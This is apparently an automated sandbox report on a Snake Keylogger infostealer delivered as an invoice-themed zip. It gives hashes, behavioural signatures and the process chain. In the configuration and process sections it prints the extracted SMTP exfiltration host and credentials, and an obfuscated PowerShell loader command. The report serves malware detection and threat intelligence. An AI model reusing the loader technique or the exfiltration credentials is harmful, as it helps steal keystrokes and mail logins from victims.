Overview
overview
10Static
static
3FACTURA_240001920.zip
windows7-x64
7FACTURA_240001920.zip
windows10-2004-x64
1document.exe
windows7-x64
3document.exe
windows10-2004-x64
10Acclimate.dec
windows7-x64
3Acclimate.dec
windows10-2004-x64
3Ergometere...ks.txt
windows7-x64
1Ergometere...ks.txt
windows10-2004-x64
1Myomectomy.und
windows7-x64
3Myomectomy.und
windows10-2004-x64
3Unlearnabi...ng.tyr
windows7-x64
3Unlearnabi...ng.tyr
windows10-2004-x64
3Unlearnabi...ae.for
windows7-x64
3Unlearnabi...ae.for
windows10-2004-x64
3bayrernes.afv
windows7-x64
3bayrernes.afv
windows10-2004-x64
3Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-11-2024 10:09
Static task
static1
Behavioral task
behavioral1
Sample
FACTURA_240001920.zip
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
FACTURA_240001920.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
document.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
document.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Acclimate.dec
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
Acclimate.dec
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Ergometerets/marks.txt
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
Ergometerets/marks.txt
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
Myomectomy.und
Resource
win7-20241023-en
Behavioral task
behavioral10
Sample
Myomectomy.und
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
Unlearnability/quadding.tyr
Resource
win7-20241010-en
Behavioral task
behavioral12
Sample
Unlearnability/quadding.tyr
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
Unlearnability/termitidae.for
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
Unlearnability/termitidae.for
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
bayrernes.afv
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
bayrernes.afv
Resource
win10v2004-20241007-en
General
-
Target
document.exe
-
Size
548KB
-
MD5
682e0e22ac2f06d26d24cac1769e1b80
-
SHA1
1302dd34b80e32415baacafecdfe31d61d0dd563
-
SHA256
51d366ab87eb5988f96d068d503d21b801b5df4535b8851364e56cbacb8fab82
-
SHA512
083c2225192987117d84bbbdbca228937f570fe31ca90aaff3a8cf6b4c1822a1b39523424723bc596056823c338cd7db193777b36487cf732bb526176935daa2
-
SSDEEP
12288:/BvLTWCL5Bj6NdVFB2dDG8DLh3g1prEPwdOC18:RhTmNFB2f2bJfG
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.tumteks.com - Port:
587 - Username:
[email protected] - Password:
Tt36556300Ss. - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
resource yara_rule behavioral4/memory/1560-75-0x0000000000E80000-0x00000000020D4000-memory.dmp family_snakekeylogger behavioral4/memory/1560-76-0x0000000000E80000-0x0000000000EA6000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 7 IoCs
flow pid Process 21 1560 msiexec.exe 23 1560 msiexec.exe 25 1560 msiexec.exe 27 1560 msiexec.exe 31 1560 msiexec.exe 34 1560 msiexec.exe 36 1560 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 20 drive.google.com 21 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 33 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1560 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4348 powershell.exe 1560 msiexec.exe -
pid Process 4348 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language document.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 1560 msiexec.exe 1560 msiexec.exe 1560 msiexec.exe 1560 msiexec.exe 1560 msiexec.exe 1560 msiexec.exe 1560 msiexec.exe 1560 msiexec.exe 1560 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4348 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 4348 powershell.exe Token: SeIncreaseQuotaPrivilege 4348 powershell.exe Token: SeSecurityPrivilege 4348 powershell.exe Token: SeTakeOwnershipPrivilege 4348 powershell.exe Token: SeLoadDriverPrivilege 4348 powershell.exe Token: SeSystemProfilePrivilege 4348 powershell.exe Token: SeSystemtimePrivilege 4348 powershell.exe Token: SeProfSingleProcessPrivilege 4348 powershell.exe Token: SeIncBasePriorityPrivilege 4348 powershell.exe Token: SeCreatePagefilePrivilege 4348 powershell.exe Token: SeBackupPrivilege 4348 powershell.exe Token: SeRestorePrivilege 4348 powershell.exe Token: SeShutdownPrivilege 4348 powershell.exe Token: SeDebugPrivilege 4348 powershell.exe Token: SeSystemEnvironmentPrivilege 4348 powershell.exe Token: SeRemoteShutdownPrivilege 4348 powershell.exe Token: SeUndockPrivilege 4348 powershell.exe Token: SeManageVolumePrivilege 4348 powershell.exe Token: 33 4348 powershell.exe Token: 34 4348 powershell.exe Token: 35 4348 powershell.exe Token: 36 4348 powershell.exe Token: SeDebugPrivilege 1560 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4544 wrote to memory of 4348 4544 document.exe 83 PID 4544 wrote to memory of 4348 4544 document.exe 83 PID 4544 wrote to memory of 4348 4544 document.exe 83 PID 4348 wrote to memory of 1560 4348 powershell.exe 96 PID 4348 wrote to memory of 1560 4348 powershell.exe 96 PID 4348 wrote to memory of 1560 4348 powershell.exe 96 PID 4348 wrote to memory of 1560 4348 powershell.exe 96 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\document.exe"C:\Users\Admin\AppData\Local\Temp\document.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Skakmatterne=Get-Content -Raw 'C:\Users\Admin\AppData\Local\skydedrene\Nitallernes\sammenlimningers\Myomectomy.Und';$Elske=$Skakmatterne.SubString(43098,3);.$Elske($Skakmatterne)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1560
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
314KB
MD5ab0b1f8d712c0b3f8cf3fdc0fedd0352
SHA1bd67c0e83b022a846b9c005ef6130e9e810d5bf7
SHA256433d5ffc66b965621e41f5af742682a475506f096daf6489fdb822b103812fae
SHA512927a00d738d81894475420fe4f33a257b0512cb887ae144b16ec4ad4cc145dba8b2d10dc9bfdaccb06c3fc7b43e933b10b07ddee4571d2e061a34150a958fc3e
-
Filesize
72KB
MD5ef1b436f4a2cb4f3dcc5b90c1fc1e3b7
SHA15e7751303869e1b5be0b5329e358d587838ec72d
SHA256e44d99f5ed408fde60776bc82f30c9ebd9f1dad717cd5d050e9e58070b8af9f6
SHA512344208d055522ee3c65383967f7f27b037e3a9af430a535897942a275c5e6f0af41e99c5a749ce1ac4cea5b2a61fbb1c1b15267973ce9c0d3eabc8fac4373d9d